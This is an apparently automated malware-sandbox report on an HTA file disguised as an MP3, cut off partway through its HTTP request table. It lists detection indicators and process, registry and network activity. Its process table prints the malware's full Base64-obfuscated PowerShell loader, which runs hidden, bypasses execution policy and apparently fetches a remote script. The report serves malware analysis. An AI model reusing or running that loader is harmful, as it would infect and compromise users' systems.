File name:

1.hta

Full analysis: https://app.any.run/tasks/70f48d14-5fe8-4dad-aab0-824abee872a2
Verdict: Malicious activity
Analysis date: March 24, 2025, 09:37:39
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: audio/mpeg
File info: Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo
MD5:

76CE45DEFFD4208663E82B5030234882

SHA1:

0EAFE1F8CBB3873F2FE981B75788B782C3811D97

SHA256:

EEFE7845F2E97D2F56DEEBC80D2AEB975E68BEF05FEDC15DF77A11309F3587DF

SSDEEP:

98304:EeOKzr2HdlPzmUmN13D7jISo49DxhHKpjS0mUW6nvZBxEHAxrqPnsSs14zwtMi65:pL3b

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes powershell execution policy

      • mshta.exe (PID: 5324)
    • Changes powershell execution policy (Unrestricted)

      • powershell.exe (PID: 968)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 2096)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 5324)
      • powershell.exe (PID: 968)
    • BASE64 encoded PowerShell command has been detected

      • mshta.exe (PID: 5324)
    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 5324)
      • powershell.exe (PID: 968)
    • Base64-obfuscated command line is found

      • mshta.exe (PID: 5324)
    • Converts a specified value to an integer (POWERSHELL)

      • powershell.exe (PID: 968)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 968)
    • Application launched itself

      • powershell.exe (PID: 968)
    • Executes script without checking the security policy

      • powershell.exe (PID: 968)
  • INFO

    • Checks supported languages

      • vlc.exe (PID: 2656)
      • identity_helper.exe (PID: 5504)
    • Reads the computer name

      • vlc.exe (PID: 2656)
      • identity_helper.exe (PID: 5504)
    • Manual execution by a user

      • mshta.exe (PID: 5324)
      • msedge.exe (PID: 7000)
      • msedge.exe (PID: 6272)
      • msedge.exe (PID: 5552)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 968)
    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 968)
    • Disables trace logs

      • powershell.exe (PID: 2096)
    • Checks proxy server information

      • slui.exe (PID: 3024)
      • powershell.exe (PID: 2096)
    • Reads the software policy settings

      • slui.exe (PID: 3024)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2096)
    • Reads Environment values

      • identity_helper.exe (PID: 5504)
    • Reads Microsoft Office registry keys

      • msedge.exe (PID: 7000)
    • Application launched itself

      • msedge.exe (PID: 7000)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.mp3 | LAME encoded MP3 audio (ID3 v2.x tag) (62.5)
.mp3 | MP3 audio (ID3 v2.x tag) (37.5)

EXIF

MPEG

MPEGAudioVersion: 1
AudioLayer: 3
AudioBitrate: 128 kbps
SampleRate: 44100
ChannelMode: Joint Stereo
MSStereo: On
IntensityStereo: Off
CopyrightFlag: -
OriginalMedia:
Emphasis: None
VBRFrames: 9055
VBRBytes: 5727907
VBRScale: 80
Encoder: LAME3.99r
LameVBRQuality: 2
LameQuality: -
LameMethod: VBR (new/mtrh)
LameLowPassFilter: 18.5 kHz
LameBitrate: 32 kbps
LameStereoMode: Joint Stereo

ID3

Title: The Prism
Artist: Noe Is Not Unique
Track: 5
RecordingTime: 2022
Genre: postgrunge
Composer: Noe Is Not Unique
PublisherURL: http://www.jamendo.com
Publisher: http://www.jamendo.com
UserDefinedText: (Tagging time) 2022-02-21T17:05:50
EncodedBy: Jamendo:http://www.jamendo.com| LAME
SourceURL: http://www.jamendo.com/en/album/475164
Comment: http://www.jamendo.com cc_standard
FileURL: http://www.jamendo.com/en/track/1927673
ArtistURL: http://www.jamendo.com/en/artist/444317
CopyrightURL: http://creativecommons.org/licenses/by-nc-sa/3.0/
Copyright: http://creativecommons.org/licenses/by-nc-sa/3.0/
Album: -
Year: 2022

Composite

DateTimeOriginal: 2022
AudioBitrate: 194 kbps
Duration: 0:03:57 (approx)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
198
Monitored processes
59
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start vlc.exe sppextcomobj.exe no specs slui.exe mshta.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs slui.exe msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs rundll32.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
132"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.3636 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=4516 --field-trial-handle=2448,i,3002772835309309843,15812028523051017197,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
300"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=7128 --field-trial-handle=2448,i,3002772835309309843,15812028523051017197,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
496\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
720"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
788"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=5556 --field-trial-handle=2448,i,3002772835309309843,15812028523051017197,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
856"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2764 --field-trial-handle=2448,i,3002772835309309843,15812028523051017197,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
968"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -nop -ep un -E JAB1AGwAVwBWAFEAVQBjAHcAVQAgAD0AIAAnADYAOQA2ADUANwA4ADUAMwA3ADQANgAxADcAMgA3ADQAMgBEADUAMAA3ADIANgBGADYAMwA2ADUANwAzADcAMwAyADAAMgAyADIANAA2ADUANgBFADcANgAzAEEANQA3ADQAOQA0AEUANAA0ADQAOQA1ADIANQBDADUAMwA3ADkANwAzADUANwA0AEYANQA3ADMANgAzADQANQBDADUANwA2ADkANgBFADYANAA2AEYANwA3ADcAMwA1ADAANgBGADcANwA2ADUANwAyADUAMwA2ADgANgA1ADYAQwA2AEMANQBDADcANgAzADEAMgBFADMAMAA1AEMANwAwADYARgA3ADcANgA1ADcAMgA3ADMANgA4ADYANQA2AEMANgBDADIARQA2ADUANwA4ADYANQAyADIAMgAwADIARAA1ADcANgA5ADYARQA2ADQANgBGADcANwA1ADMANwA0ADcAOQA2AEMANgA1ADIAMAA0ADgANgA5ADYANAA2ADQANgA1ADYARQAyADAAMgBEADQAMQA3ADIANgA3ADcANQA2AEQANgA1ADYARQA3ADQANABDADYAOQA3ADMANwA0ADIAMAAyADcAMgBEADQARQA2AEYANQAwADcAMgA2AEYANgA2ADYAOQA2AEMANgA1ADIANwAyAEMAMgA3ADIARAA0ADUANwA4ADYANQA2ADMANwA1ADcANAA2ADkANgBGADYARQA1ADAANgBGADYAQwA2ADkANgAzADcAOQAyADcAMgBDADIANwA1ADUANgBFADcAMgA2ADUANwAzADcANAA3ADIANgA5ADYAMwA3ADQANgA1ADYANAAyADcAMgBDADIANwAyAEQANAAzADYARgA2AEQANgBEADYAMQA2AEUANgA0ADIANwAyAEMAMgA3ADUAMwA1ADYAMgAwADcAMAA2ADYAMgAwADIAOAAyADgAMgA4ADIAOAA1AEIANABFADYANQA3ADQAMgBFADUANwA2ADUANgAyADQAMwA2AEMANgA5ADYANQA2AEUANwA0ADUARAAzAEEAMwBBADQARQA2ADUANwA3ADIAOAAyADkANwBDADQANwA2ADUANwA0ADIARAA0AEQANgA1ADYARAA2ADIANgA1ADcAMgAyADkANwBDADUANwA2ADgANgA1ADcAMgA2ADUAMgBEADQARgA2ADIANgBBADYANQA2ADMANwA0ADcAQgAyADQANQBGADIARQA0AEUANgAxADYARAA2ADUAMgAwADIARAA2ADMANgBDADYAOQA2AEIANgA1ADIANwAyADcAMgBBADcANwA2AEUAMgBBADYANAAyAEEANgA3ADIANwAyADcANwBEADIAOQAyAEUANABFADYAMQA2AEQANgA1ADIAOQAyADkAMwBCADUAMwA1ADYAMgAwADQAQQAzADUAMgAwADIANwAyADcANgA4ADcANAA3ADQANwAwADcAMwAzAEEAMgBGADIARgA2ADIAMgBFADcAOQA2ADUANgAxADYAOQA2AEYAMgBFADcAMwA2ADgANgBGADcAMAAyAEYAMwA2ADYANAAzADAAMwA1ADMAMwAzADUAMwA4ADYAMgAzADMAMwA4ADMAMwA2ADIAMwA1ADYANgAzADYAMwA0ADYANgAzADkAMwA0ADMAOQAzADQANgA0ADMAOQAzADgAMwA2ADMAMwA2ADQANgAxADYANgAzADIANgA1ADYAMQAzADQANgAzADYAMgA2ADYAMwA5ADMANgA2ADYAMwAzADMANQAzADIAMwAxADMAMgA2ADIAMwA0ADMAMwAyAEUANwA2ADcAMwA3ADMAMgA3ADIANwAzAEIANQAzADQAOQAyADAANQA2ADYAMQA3ADIANgA5ADYAMQA2ADIANgBDADYANQAzAEEANQBDADQARgA2AEEAMgAwADIAOAA1AEIANABFADYANQA3ADQAMgBFADUANwA2ADUANgAyADQAMwA2AEMANgA5ADYANQA2AEUANwA0ADUARAAzAEEAMwBBADQARQA2ADUANwA3ADIAOAAyADkAMgA5ADMAQgAyAEUAMgA4ADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMgAwADQANQAyAEEANgBGADYARQA3ADQANgA1ADIAQQAyADAAMgBEADUANgA2ADEAMgA5ADIARQA0ADkANgBFADcANgA2AEYANgBCADYANQA0ADMANgBGADYARAA2AEQANgAxADYARQA2ADQAMgBFADQANwA2ADUANwA0ADQAMwA2AEYANgBEADYARAA2ADEANgBFADYANAAyADgAMgA4ADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMgAwADQANQAyAEEANgBGADYARQA3ADQANgA1ADIAQQAyADAAMgBEADUANgA2ADEAMgA5ADIARQA0ADkANgBFADcANgA2AEYANgBCADYANQA0ADMANgBGADYARAA2AEQANgAxADYARQA2ADQAMgBFADQANwA2ADUANwA0ADQAMwA2AEYANgBEADYARAA2ADEANgBFADYANAA0AEUANgAxADYARAA2ADUAMgA4ADIANwAyADcANAA5ADYARQAyAEEANwAzADcAMwA2ADkAMgBBADIANwAyADcAMgBDADIANAA1ADQANQAyADUANQA0ADUAMgBDADIANAA1ADQANQAyADUANQA0ADUAMgA5ADIAQwA1AEIANQAzADcAOQA3ADMANwA0ADYANQA2AEQAMgBFADQARAA2ADEANgBFADYAMQA2ADcANgA1ADYARAA2ADUANgBFADcANAAyAEUANAAxADcANQA3ADQANgBGADYARAA2ADEANwA0ADYAOQA2AEYANgBFADIARQA0ADMANgBGADYARAA2AEQANgAxADYARQA2ADQANQA0ADcAOQA3ADAANgA1ADcAMwA1AEQAMwBBADMAQQA0ADMANgBEADYANAA2AEMANgA1ADcANAAyADkAMgA4ADUANgA2ADEANwAyADYAOQA2ADEANgAyADYAQwA2ADUAMgAwADQARgA2AEEAMgA5ADIARQA1ADYANgAxADYAQwA3ADUANgA1ADIARQAyADgAMgA4ADQANwA0ADMANAA5ADIAMAA1ADYANgAxADcAMgA2ADkANgAxADYAMgA2AEMANgA1ADMAQQA3ADAANgA2ADIAOQAyAEUANQA2ADYAMQA2AEMANwA1ADYANQAyADkAMgA4ADIAOAA0ADcANAAzADQAOQAyADAANQA2ADYAMQA3ADIANgA5ADYAMQA2ADIANgBDADYANQAzAEEANQBDADQAQQAzADUAMgA5ADIARQA1ADYANgAxADYAQwA3ADUANgA1ADIAOQAyADcAMwBCADIANAA3ADUANAA4ADQAMQA0ADEANgA2ADIAMAAzAEQAMgAwADIANAA2ADUANgBFADcANgAzAEEANAAxADcAMAA3ADAANAA0ADYAMQA3ADQANgAxADMAQgA2ADYANwA1ADYARQA2ADMANwA0ADYAOQA2AEYANgBFADIAMAA3AEEANgAxADQAMgA3ADIAMgA4ADIANAA0ADYANQBBADcAOAA1ADAANgBFADUANgA3ADYANABBADIAQwAyADAAMgA0ADQARAA3ADYANgAxADQAOAA3ADgANgBFADIAOQA3AEIANgAzADcANQA3ADIANgBDADIAMAAyADQANAA2ADUAQQA3ADgANQAwADYARQA1ADYANwA2ADQAQQAyADAAMgBEADYARgAyADAAMgA0ADQARAA3ADYANgAxADQAOAA3ADgANgBFADcARAAzAEIANgA2ADcANQA2AEUANgAzADcANAA2ADkANgBGADYARQAyADAANgA3ADQANAA0ADcANAA0ADQARgA2AEYANgBEADIAOAAyADkANwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADQARQA3ADcANABDADYANAA1ADEANABBADcAMwA1ADgAMgA4ADIANAA3AEEANgBGADQANgA3ADgANQAyADQANwAyADkANwBCADYAOQA2ADYAMgA4ADIAMQAyADgANQA0ADYANQA3ADMANwA0ADIARAA1ADAANgAxADcANAA2ADgAMgAwADIARAA1ADAANgAxADcANAA2ADgAMgAwADIANAA0AEQANwA2ADYAMQA0ADgANwA4ADYARQAyADkAMgA5ADcAQgA3AEEANgAxADQAMgA3ADIAMgAwADIANAA3AEEANgBGADQANgA3ADgANQAyADQANwAyADAAMgA0ADQARAA3ADYANgAxADQAOAA3ADgANgBFADcARAA3AEQANwBEADYANwA0ADQANAA3ADQANAA0AEYANgBGADYARAAzAEIAJwAgAC0AcwBwAGwAaQB0ACAAJwAoAC4AewAyAH0AKQAnACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8AfQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AFsAYwBoAGEAcgBdACgAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBJAG4AdAAzADIAKAAkAF8ALAAxADYAKQApAH0AOwAkAHUAbABXAFYAUQBVAGMAdwBVACAAPQAgACQAdQBsAFcAVgBRAFUAYwB3AFUAIAAtAGoAbwBpAG4AIAAnACcAOwAgACYAIAAkAHUAbABXAFYAUQBVAGMAdwBVAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAwACwAMwApACAAJAB1AGwAVwBWAFEAVQBjAHcAVQAuAFMAdQBiAHMAdAByAGkAbgBnACgAMwApAA==C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
1012"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4188 --field-trial-handle=2448,i,3002772835309309843,15812028523051017197,262144 --variations-seed-version /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1072C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
1072"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4564 --field-trial-handle=2448,i,3002772835309309843,15812028523051017197,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
19 293
Read events
19 248
Write events
45
Delete events
0

Modification events

(PID) Process:(5324) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5324) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5324) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(2096) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2096) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2096) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2096) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(2096) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(2096) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2096) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
12
Suspicious files
190
Text files
51
Unknown types
1

Dropped files

PID
Process
Filename
Type
2656vlc.exe
MD5:
SHA256:
2656vlc.exeC:\Users\admin\AppData\Roaming\vlc\vlc-qt-interface.ini.Mk2656text
MD5:D54DCE0786E5CF98E394B7B31BB145AA
SHA256:64618CCA51846862DC94E1A4536F2DB90967F5D838825D32DB31DED92FE05DA6
7000msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Local State~RF12e9fa.TMPbinary
MD5:1051384B8864AC718AE413E9B1D309A5
SHA256:3FC536607727B6030F7B4714D6E03B4CA040B2EBDBE81B74538F345432207360
968powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0O7P28MS80OZTL4K914J.tempbinary
MD5:163CB0F963C1EF24A45B757137A5C694
SHA256:397E5FDF84D5B59E4FE3D1A0852E16CA29CC2426354E6D8E72B29B0994F9B252
7000msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datbinary
MD5:1E9E15EF6E531C4557100F20C9C76F01
SHA256:46CB063CC268B69B172660F166C4394D5B4EDD802388B3EC16766DEBDB9F86C3
7000msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF12eaa6.TMP
MD5:
SHA256:
7000msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
968powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_otgpvs0j.lz5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7000msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF12eaa6.TMP
MD5:
SHA256:
968powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:86732480A5DD646F74120C8F8EABC5C0
SHA256:1735BFB56B38FB4D754B28F3D14A29BA37D8A4B08C3E8C97C787C96B149643AA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
43
TCP/UDP connections
61
DNS requests
56
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2656
vlc.exe
GET
200
65.108.45.53:80
http://mb.videolan.org/ws/2/recording/?query=artist%3A%22Noe%20Is%20Not%20Unique%22%20AND%20recording%3A%22The%20Prism%22
unknown
malicious
2656
vlc.exe
GET
301
142.250.186.174:80
http://images.google.com/images?q=Noe%20Is%20Not%20Unique%20The%20Prism%20cover
unknown
whitelisted
2656
vlc.exe
GET
200
65.108.45.53:80
http://mb.videolan.org/ws/2/recording/?query=artist%3A%22Noe%20Is%20Not%20Unique%22%20AND%20recording%3A%22The%20Prism%22
unknown
malicious
2656
vlc.exe
GET
301
142.250.186.174:80
http://images.google.com/search?q=Noe+Is+Not+Unique+The+Prism+cover&tbm=isch
unknown
whitelisted
2656
vlc.exe
GET
301
142.250.186.174:80
http://images.google.com/images?q=Noe%20Is%20Not%20Unique%20The%20Prism%20cover
unknown
whitelisted
2656
vlc.exe
GET
200
142.250.186.36:80
http://www.google.com/search?q=Noe+Is+Not+Unique+The+Prism+cover&tbm=isch
unknown
whitelisted
5072
backgroundTaskHost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
2656
vlc.exe
GET
301
142.250.186.174:80
http://images.google.com/search?q=Noe+Is+Not+Unique+The+Prism+cover&tbm=isch
unknown
whitelisted
2656
vlc.exe
GET
200
